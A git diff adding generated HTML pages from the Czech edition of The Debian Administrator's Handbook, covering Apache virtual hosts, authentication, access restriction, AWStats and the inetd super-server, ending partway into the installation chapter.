+                class="emphasis"><em>Server Name Indication</em></span> (SNI). This extension allows the browser to send the hostname of the web server during the establishment of the SSL connection, much earlier than the HTTP request itself, which was previously used to identify the requested virtual host among those hosted on the same server (with the same IP address and port). This allows Apache to select the most appropriate SSL certificate for the transaction to proceed.
+			</div><div
+              class="para">
+				Before SNI, Apache would always use the certificate defined in the default virtual host. Clients trying to access another virtual host would then display warnings, since the certificate they received didn't match the website they were trying to access. Fortunately, most browsers now work with SNI; this includes Microsoft Internet Explorer starting with version 7.0 (starting on Vista), Mozilla Firefox starting with version 2.0, Apple Safari since version 3.2.1, and all versions of Google Chrome.
+			</div><div
+              class="para">
+				The Apache package provided in Debian is built with support for SNI; no particular configuration is therefore needed.
+			</div><div
+              class="para">
+				Care should also be taken to ensure that the configuration for the first virtual host (the one used by default) does enable TLSv1, since Apache uses the parameters of this first virtual host to establish secure connections, and they had better allow them!
+			</div></div><div
+            class="para">
+				Each extra virtual host is then described by a file stored in <code
+              class="filename">/etc/apache2/sites-available/</code>. Setting up a website for the <code
+              class="literal">falcot.org</code> domain is therefore a simple matter of creating the following file, then enabling the virtual host with <code
+              class="command">a2ensite www.falcot.org</code>.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.5.10.10"></a><p
+              class="title"><strong>Příklad 11.16. The <code
+                  class="filename">/etc/apache2/sites-available/www.falcot.org.conf</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+&lt;VirtualHost *:80&gt;
+ServerName www.falcot.org
+ServerAlias falcot.org
+DocumentRoot /srv/www/www.falcot.org
+&lt;/VirtualHost&gt;
+</pre></div></div><div
+            class="para">
+				The Apache server, as configured so far, uses the same log files for all virtual hosts (although this could be changed by adding <code
+              class="literal">CustomLog</code> directives in the definitions of the virtual hosts). It therefore makes good sense to customize the format of this log file to have it include the name of the virtual host. This can be done by creating a <code
+              class="filename">/etc/apache2/conf-available/customlog.conf</code> file that defines a new format for all log files (with the <code
+              class="literal">LogFormat</code> directive) and by enabling it with <code
+              class="command">a2enconf customlog</code>. The <code
+              class="literal">CustomLog</code> line must also be removed (or commented out) from the <code
+              class="filename">/etc/apache2/sites-available/000-default.conf</code> file.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.5.10.12"></a><p
+              class="title"><strong>Příklad 11.17. The <code
+                  class="filename">/etc/apache2/conf.d/customlog.conf</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting scale">
+# New log format including (virtual) host name
+LogFormat "%v %h %l %u %t \"%r\" %&gt;s %b \"%{Referer}i\" \"%{User-Agent}i\"" vhost
+
+# Now let's use this "vhost" format by default
+CustomLog /var/log/apache2/access.log vhost
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.5.11"></a>11.2.3. Common Directives</h3></div></div></div><div
+            class="para">
+				This section briefly reviews some of the commonly-used Apache configuration directives.
+			</div><a
+            id="id-1.14.5.11.3"
+            class="indexterm"></a><a
+            id="id-1.14.5.11.4"
+            class="indexterm"></a><div
+            class="para">
+				The main configuration file usually includes several <code
+              class="literal">Directory</code> blocks; they allow specifying different behaviors for the server depending on the location of the file being served. Such a block commonly includes <code
+              class="literal">Options</code> and <code
+              class="literal">AllowOverride</code> directives.
+			</div><a
+            id="id-1.14.5.11.6"
+            class="indexterm"></a><a
+            id="id-1.14.5.11.7"
+            class="indexterm"></a><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.5.11.8"></a><p
+              class="title"><strong>Příklad 11.18. Directory block</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+&lt;Directory /var/www&gt;
+Options Includes FollowSymlinks
+AllowOverride All
+DirectoryIndex index.php index.html index.htm
+&lt;/Directory&gt;
+</pre></div></div><div
+            class="para">
+				The <code
+              class="literal">DirectoryIndex</code> directive contains a list of files to try when the client request matches a directory. The first existing file in the list is used and sent as a response.
+			</div><a
+            id="id-1.14.5.11.10"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="literal">Options</code> directive is followed by a list of options to enable. The <code
+              class="literal">None</code> value disables all options; correspondingly, <code
+              class="literal">All</code> enables them all except <code
+              class="literal">MultiViews</code>. Available options include:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ExecCGI</code> indicates that CGI scripts can be executed. <a
+                    id="id-1.14.5.11.12.1.1.2"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">FollowSymlinks</code> tells the server that symbolic links can be followed, and that the response should contain the contents of the target of such links. <a
+                    id="id-1.14.5.11.12.2.1.2"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">SymlinksIfOwnerMatch</code> also tells the server to follow symbolic links, but only when the link and the its target have the same owner. <a
+                    id="id-1.14.5.11.12.3.1.2"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">Includes</code> enables <span
+                    class="emphasis"><em>Server Side Includes</em></span> (<span
+                    class="emphasis"><em>SSI</em></span> for short). These are directives embedded in HTML pages and executed on the fly for each request. <a
+                    id="id-1.14.5.11.12.4.1.4"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">Indexes</code> tells the server to list the contents of a directory if the HTTP request sent by the client points at a directory without an index file (ie, when no files mentioned by the <code
+                    class="literal">DirectoryIndex</code> directive exists in this directory). <a
+                    id="id-1.14.5.11.12.5.1.3"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">MultiViews</code> enables content negotiation; this can be used by the server to return a web page matching the preferred language as configured in the browser. <a
+                    id="id-1.14.5.11.12.6.1.2"
+                    class="indexterm"></a>
+					</div></li></ul></div><div
+            class="para">
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> <code
+                        class="filename">.htaccess</code> file</strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="filename">.htaccess</code> file contains Apache configuration directives enforced each time a request concerns an element of the directory where it is stored. The scope of these directives also recurses to all the subdirectories within.
+			</div><a
+              id="id-1.14.5.11.14.3"
+              class="indexterm"></a><div
+              class="para">
+				Most of the directives that can occur in a <code
+                class="literal">Directory</code> block are also legal in a <code
+                class="filename">.htaccess</code> file.
+			</div></div><div
+            class="para">
+				The <code
+              class="literal">AllowOverride</code> directive lists all the options that can be enabled or disabled by way of a <code
+              class="filename">.htaccess</code> file. A common use of this option is to restrict <code
+              class="literal">ExecCGI</code>, so that the administrator chooses which users are allowed to run programs under the web server's identity (the <code
+              class="literal">www-data</code> user).
+			</div><a
+            id="id-1.14.5.11.16"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.5.11.17"></a>11.2.3.1. Requiring Authentication</h4></div></div></div><a
+              id="id-1.14.5.11.17.2"
+              class="indexterm"></a><div
+              class="para">
+					In some circumstances, access to part of a website needs to be restricted, so only legitimate users who provide a username and a password are granted access to the contents.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.5.11.17.4"></a><p
+                class="title"><strong>Příklad 11.19. <code
+                    class="filename">.htaccess</code> file requiring authentication</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+Require valid-user
+AuthName "Private directory"
+AuthType Basic
+AuthUserFile /etc/apache2/authfiles/htpasswd-private
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> No security</strong></p></div></div></div><div
+                class="para">
+					The authentication system used in the above example (<code
+                  class="literal">Basic</code>) has minimal security as the password is sent in clear text (it is only encoded as <span
+                  class="emphasis"><em>base64</em></span>, which is a simple encoding rather than an encryption method). It should also be noted that the documents “protected” by this mechanism also go over the network in the clear. If security is important, the whole HTTP connection should be encrypted with SSL.
+				</div></div><div
+              class="para">
+					The <code
+                class="filename">/etc/apache2/authfiles/htpasswd-private</code> file contains a list of users and passwords; it is commonly manipulated with the <code
+                class="command">htpasswd</code> command. For example, the following command is used to add a user or change their password: <a
+                id="id-1.14.5.11.17.6.3"
+                class="indexterm"></a>
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>htpasswd /etc/apache2/authfiles/htpasswd-private <em
+                    class="replaceable">user</em>
+</code></strong><code
+                class="computeroutput">New password:
+Re-type new password:
+Adding password for user <em
+                  class="replaceable">user</em>
+</code></pre></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.5.11.18"></a>11.2.3.2. Restricting Access</h4></div></div></div><a
+              id="id-1.14.5.11.18.2"
+              class="indexterm"></a><div
+              class="para">
+					The <code
+                class="literal">Require</code> directive controls access restrictions for a directory (and its subdirectories, recursively).
+				</div><a
+              id="id-1.14.5.11.18.4"
+              class="indexterm"></a><a
+              id="id-1.14.5.11.18.5"
+              class="indexterm"></a><a
+              id="id-1.14.5.11.18.6"
+              class="indexterm"></a><div
+              class="para">
+					It can be used to restrict access based on many criteria; we will stop at describing access restriction based on the IP address of the client, but it can be made much more powerful than that, especially when several <code
+                class="literal">Require</code> directives are combined within a <code
+                class="literal">RequireAll</code> block.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.5.11.18.8"></a><p
+                class="title"><strong>Příklad 11.20. Only allow from the local network</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">Require ip 192.168.0.0/16
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ALTERNATIVE</em></span> Old syntax</strong></p></div></div></div><div
+                class="para">
+					The <code
+                  class="literal">Require</code> syntax is only available in Apache 2.4 (the version in <span
+                  class="distribution distribution">Jessie</span>). For users of <span
+                  class="distribution distribution">Wheezy</span>, the Apache 2.2 syntax is different, and we describe it here mainly for reference, although it can also be made available in Apache 2.4 using the <code
+                  class="literal">mod_access_compat</code> module.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">Allow from</code> and <code
+                  class="literal">Deny from</code> directives control access restrictions for a directory (and its subdirectories, recursively).
+				</div><a
+                id="id-1.14.5.11.18.9.4"
+                class="indexterm"></a><a
+                id="id-1.14.5.11.18.9.5"
+                class="indexterm"></a><a
+                id="id-1.14.5.11.18.9.6"
+                class="indexterm"></a><div
+                class="para">
+					The <code
+                  class="literal">Order</code> directive tells the server of the order in which the <code
+                  class="literal">Allow from</code> and <code
+                  class="literal">Deny from</code> directives are applied; the last one that matches takes precedence. In concrete terms, <code
+                  class="literal">Order deny,allow</code> allows access if no <code
+                  class="literal">Deny from</code> applies, or if an <code
+                  class="literal">Allow from</code> directive does. Conversely, <code
+                  class="literal">Order allow,deny</code> rejects access if no <code
+                  class="literal">Allow from</code> directive matches (or if a <code
+                  class="literal">Deny from</code> directive applies).
+				</div><div
+                class="para">
+					The <code
+                  class="literal">Allow from</code> and <code
+                  class="literal">Deny from</code> directives can be followed by an IP address, a network (such as <code
+                  class="literal">192.168.0.0/255.255.255.0</code>, <code
+                  class="literal">192.168.0.0/24</code> or even <code
+                  class="literal">192.168.0</code>), a hostname or a domain name, or the <code
+                  class="literal">all</code> keyword, designating everyone.
+				</div><div
+                class="para">
+					For instance, to reject connections by default but allow them from the local network, you could use this:
+				</div><pre
+                class="programlisting">
+Order deny,allow
+Allow from 192.168.0.0/16
+Deny from all
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.5.12"></a>11.2.4. Log Analyzers</h3></div></div></div><div
+            class="para">
+				A log analyzer is frequently installed on a web server; since the former provides the administrators with a precise idea of the usage patterns of the latter.
+			</div><div
+            class="para">
+				The Falcot Corp administrators selected <span
+              class="emphasis"><em>AWStats</em></span> (<span
+              class="emphasis"><em>Advanced Web Statistics</em></span>) to analyze their Apache log files.
+			</div><a
+            id="id-1.14.5.12.4"
+            class="indexterm"></a><a
+            id="id-1.14.5.12.5"
+            class="indexterm"></a><a
+            id="id-1.14.5.12.6"
+            class="indexterm"></a><a
+            id="id-1.14.5.12.7"
+            class="indexterm"></a><div
+            class="para">
+				The first configuration step is the customization of the <code
+              class="filename">/etc/awstats/awstats.conf</code> file. The Falcot administrators keep it unchanged apart from the following parameters:
+			</div><pre
+            class="programlisting">
+LogFile="/var/log/apache2/access.log"
+LogFormat = "%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot"
+SiteDomain="www.falcot.com"
+HostAliases="falcot.com REGEX[^.*\.falcot\.com$]"
+DNSLookup=1
+LoadPlugin="tooltips"
+</pre><div
+            class="para">
+				All these parameters are documented by comments in the template file. In particular, the <code
+              class="varname">LogFile</code> and <code
+              class="varname">LogFormat</code> parameters describe the location and format of the log file and the information it contains; <code
+              class="varname">SiteDomain</code> and <code
+              class="varname">HostAliases</code> list the various names under which the main web site is known.
+			</div><div
+            class="para">
+				For high traffic sites, <code
+              class="varname">DNSLookup</code> should usually not be set to <code
+              class="literal">1</code>; for smaller sites, such as the Falcot one described above, this setting allows getting more readable reports that include full machine names instead of raw IP addresses.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> Access to statistics</strong></p></div></div></div><div
+              class="para">
+				AWStats makes its statistics available on the website with no restrictions by default, but restrictions can be set up so that only a few (probably internal) IP addresses can access them; the list of allowed IP addresses needs to be defined in the <code
+                class="varname">AllowAccessFromWebToFollowingIPAddresses</code> parameter
+			</div></div><div
+            class="para">
+				AWStats will also be enabled for other virtual hosts; each virtual host needs its own configuration file, such as <code
+              class="filename">/etc/awstats/awstats.www.falcot.org.conf</code>.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.5.12.14"></a><p
+              class="title"><strong>Příklad 11.21. AWStats configuration file for a virtual host</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+Include "/etc/awstats/awstats.conf"
+SiteDomain="www.falcot.org"
+HostAliases="falcot.org"
+</pre></div></div><div
+            class="para">
+				AWStats uses many icons stored in the <code
+              class="filename">/usr/share/awstats/icon/</code> directory. In order for these icons to be available on the web site, the Apache configuration needs to be adapted to include the following directive:
+			</div><pre
+            class="programlisting">
+Alias /awstats-icon/ /usr/share/awstats/icon/
+</pre><div
+            class="para">
+				After a few minutes (and once the script has been run a few times), the results are available online: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.falcot.com/cgi-bin/awstats.pl">http://www.falcot.com/cgi-bin/awstats.pl</a></div><div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.falcot.org/cgi-bin/awstats.pl">http://www.falcot.org/cgi-bin/awstats.pl</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Log file rotation</strong></p></div></div></div><div
+              class="para">
+				In order for the statistics to take all the logs into account, <span
+                class="emphasis"><em>AWStats</em></span> needs to be run right before the Apache log files are rotated. Looking at the <code
+                class="literal">prerotate</code> directive of <code
+                class="filename">/etc/logrotate.d/apache2</code> file, this can be solved by putting a symlink to <code
+                class="filename">/usr/share/awstats/tools/update.sh</code> in <code
+                class="filename">/etc/logrotate.d/httpd-prerotate</code>:
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>cat /etc/logrotate.d/apache2
+</code></strong><code
+                class="computeroutput">/var/log/apache2/*.log {
+  daily
+  missingok
+  rotate 14
+  compress
+  delaycompress
+  notifempty
+  create 644 root adm
+  sharedscripts
+  postrotate
+    if /etc/init.d/apache2 status &gt; /dev/null ; then \
+      /etc/init.d/apache2 reload &gt; /dev/null; \
+    fi;
+  endscript
+  prerotate
+    if [ -d /etc/logrotate.d/httpd-prerotate ]; then \
+      run-parts /etc/logrotate.d/httpd-prerotate; \
+    fi; \
+  endscript
+}
+$ </code><strong
+                class="userinput"><code>sudo mkdir -p /etc/logrotate.d/httpd-prerotate
+</code></strong><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>sudo ln -sf /usr/share/awstats/tools/update.sh \
+  /etc/logrotate.d/httpd-prerotate/awstats
+</code></strong></pre><div
+              class="para">
+				Note also that the log files created by <code
+                class="command">logrotate</code> need to be readable by everyone, especially AWStats. In the above example, this is ensured by the <code
+                class="literal">create 644 root adm</code> line (instead of the default <code
+                class="literal">640</code> permissions).
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="network-services.html"><strong>Předcházející</strong>Kapitola 11. Network Services: Postfix, Apache, N...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ftp-file-server.html"><strong>Další</strong>11.3. FTP File Server</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.inetd.html b/tmp/cs-CZ/html/sect.inetd.html
new file mode 100644
index 000000000..ac99c9b81
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.inetd.html
@@ -0,0 +1,212 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.6. The inetd Super-Server</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.syslog.html"
+        title="9.5. syslog System Events" /><link
+        rel="next"
+        href="sect.task-scheduling-cron-atd.html"
+        title="9.7. Scheduling Tasks with cron and atd" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.inetd.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.syslog.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.task-scheduling-cron-atd.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.inetd"></a>9.6. The <code
+                  class="command">inetd</code> Super-Server</h2></div></div></div><div
+          class="para">
+			Inetd (often called “Internet super-server”) is a server of servers. It executes rarely used servers on demand, so that they do not have to run continuously.
+		</div><a
+          id="id-1.12.9.3"
+          class="indexterm"></a><a
+          id="id-1.12.9.4"
+          class="indexterm"></a><div
+          class="para">
+			The <code
+            class="filename">/etc/inetd.conf</code> file lists these servers and their usual ports. The <code
+            class="command">inetd</code> command listens to all of them; when it detects a connection to any such port, it executes the corresponding server program.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>DEBIAN POLICY</em></span> Register a server in <code
+                      class="filename">inetd.conf</code></strong></p></div></div></div><div
+            class="para">
+			Packages frequently want to register a new server in the <code
+              class="filename">/etc/inetd.conf</code> file, but Debian Policy prohibits any package from modifying a configuration file that it doesn't own. This is why the <code
+              class="command">update-inetd</code> script (in the package with the same name) was created: It manages the configuration file, and other packages can thus use it to register a new server to the super-server's configuration.
+		</div></div><div
+          class="para">
+			Each significant line of the <code
+            class="filename">/etc/inetd.conf</code> file describes a server through seven fields (separated by spaces):
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					The TCP or UDP port number, or the service name (which is mapped to a standard port number with the information contained in the <code
+                  class="filename">/etc/services</code> file).
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The socket type: <code
+                  class="literal">stream</code> for a TCP connection, <code
+                  class="literal">dgram</code> for UDP datagrams.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The protocol: <code
+                  class="literal">tcp</code> or <code
+                  class="literal">udp</code>.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The options: two possible values: <code
+                  class="literal">wait</code> or <code
+                  class="literal">nowait</code>, to tell <code
+                  class="command">inetd</code> whether it should wait or not for the end of the launched process before accepting another connection. For TCP connections, easily multiplexable, you can usually use <code
+                  class="literal">nowait</code>. For programs responding over UDP, you should use <code
+                  class="literal">nowait</code> only if the server is capable of managing several connections in parallel. You can suffix this field with a period, followed by the maximum number of connections authorized per minute (the default limit is 256).
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The user name of the user under whose identity the server will run.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The full path to the server program to execute.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The arguments: this is a complete list of the program's arguments, including its own name (<code
+                  class="literal">argv[0]</code> in C).
+				</div></li></ul></div><div
+          class="para">
+			The following example illustrates the most common cases:
+		</div><div
+          class="example"><a
+            xmlns=""
+            id="example.inetd-conf"></a><p
+            class="title"><strong>Příklad 9.1. Excerpt from <code
+                class="filename">/etc/inetd.conf</code></strong></p><div
+            class="example-contents"><pre
+              class="programlisting">talk   dgram  udp wait    nobody.tty /usr/sbin/in.talkd in.talkd
+finger stream tcp nowait  nobody     /usr/sbin/tcpd     in.fingerd
+ident  stream tcp nowait  nobody     /usr/sbin/identd   identd -i
+</pre></div></div><a
+          id="id-1.12.9.11"
+          class="indexterm"></a><div
+          class="para">
+			The <code
+            class="command">tcpd</code> program is frequently used in the <code
+            class="filename">/etc/inetd.conf</code> file. It allows limiting incoming connections by applying access control rules, documented in the <span
+            class="citerefentry"><span
+              class="refentrytitle">hosts_access</span>(5)</span> manual page, and which are configured in the <code
+            class="filename">/etc/hosts.allow</code> and <code
+            class="filename">/etc/hosts.deny</code> files. Once it has been determined that the connection is authorized, <code
+            class="command">tcpd</code> executes the real server (like <code
+            class="command">in.fingerd</code> in our example). It is worth noting that <code
+            class="command">tcpd</code> relies on the name under which it was invoked (that is the first argument, <code
+            class="literal">argv[0]</code>) to identify the real program to run. So you should not start the arguments list with <code
+            class="literal">tcpd</code> but with the program that must be wrapped.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>COMMUNITY</em></span> Wietse Venema</strong></p></div></div></div><a
+            id="id-1.12.9.13.2"
+            class="indexterm"></a><a
+            id="id-1.12.9.13.3"
+            class="indexterm"></a><div
+            class="para">
+			Wietse Venema, whose expertise in security has made him a renowned programmer, is the author of the <code
+              class="command">tcpd</code> program. He is also the main creator of Postfix, the modular e-mail server (SMTP, Simple Mail Transfer Protocol), designed to be safer and more reliable than <code
+              class="command">sendmail</code>, which features a long history of security vulnerabilities.
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Other <code
+                      class="command">inetd</code> commands</strong></p></div></div></div><div
+            class="para">
+			While Debian installs <span
+              class="pkg pkg">openbsd-inetd</span> by default, there is no lack of alternatives: we can mention <span
+              class="pkg pkg">inetutils-inetd</span>, <span
+              class="pkg pkg">micro-inetd</span>, <span
+              class="pkg pkg">rlinetd</span> and <span
+              class="pkg pkg">xinetd</span>.
+		</div><div
+            class="para">
+			This last incarnation of a super-server offers very interesting possibilities. Most notably, its configuration can be split into several files (stored, of course, in the <code
+              class="filename">/etc/xinetd.d/</code> directory), which can make an administrator's life easier.
+		</div><div
+            class="para">
+			Last but not least, it is even possible to emulate <code
+              class="command">inetd</code>'s behaviour with <code
+              class="command">systemd</code>'s socket-activation mechanism (see <a
+              class="xref"
+              href="unix-services.html#sect.systemd">9.1.1 – „The systemd init system“</a>).
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.syslog.html"><strong>Předcházející</strong>9.5. syslog System Events</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.task-scheduling-cron-atd.html"><strong>Další</strong>9.7. Scheduling Tasks with cron and atd</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.installation-steps.html b/tmp/cs-CZ/html/sect.installation-steps.html
new file mode 100644
index 000000000..fa8b3c659
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.installation-steps.html
@@ -0,0 +1,897 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">4.2. Installing, Step by Step</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Installation, Partitioning, Formatting, File System, Boot Sector, Hardware Detection" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="installation.html"
+        title="Kapitola 4. Installation" /><link
+        rel="prev"
+        href="installation.html"
+        title="Kapitola 4. Installation" /><link
+        rel="next"
+        href="sect.after-first-boot.html"
+        title="4.3. After the First Boot" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.installation-steps.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="installation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.after-first-boot.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.installation-steps"></a>4.2. Installing, Step by Step</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-boot"></a>4.2.1. Booting and Starting the Installer</h3></div></div></div><div
+            class="para">
+				Once the BIOS has begun booting from the CD- or DVD-ROM, the Isolinux bootloader menu appears. At this stage, the Linux kernel is not yet loaded; this menu allows you to choose the kernel to boot and enter possible parameters to be transferred to it in the process.
+			</div><div
+            class="para">
+				For a standard installation, you only need to choose “Install” or “Graphical install” (with the arrow keys), then press the <span
+              class="keycap"><strong>Enter</strong></span> key to initiate the remainder of the installation process. If the DVD-ROM is a “Multi-arch” disk, and the machine has an Intel or AMD 64 bit processor, those menu options enable the installation of the 64 bit variant (<span
+              class="emphasis"><em>amd64</em></span>) and the installation of the 32 bit variant remains available in a dedicated sub-menu (“32-bit install options”). If you have a 32 bit processor, you don't get a choice and the menu entries install the 32 bit variant (<span
+              class="emphasis"><em>i386</em></span>).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> 32 or 64 bits?</strong></p></div></div></div><a
+              id="id-1.7.12.2.4.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.2.4.3"
+              class="indexterm"></a><a
+              id="id-1.7.12.2.4.4"
